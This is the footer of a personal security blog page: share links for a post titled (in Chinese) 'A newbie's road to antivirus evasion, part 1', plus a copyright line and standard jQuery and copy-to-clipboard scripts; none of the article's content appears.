  <li><a class="icon" href="mailto:?subject=一个菜鸟的免杀之路（一）&body=Check out this article: http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&name=一个菜鸟的免杀之路（一）&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&t=一个菜鸟的免杀之路（一）"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022
    hangchuanin
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
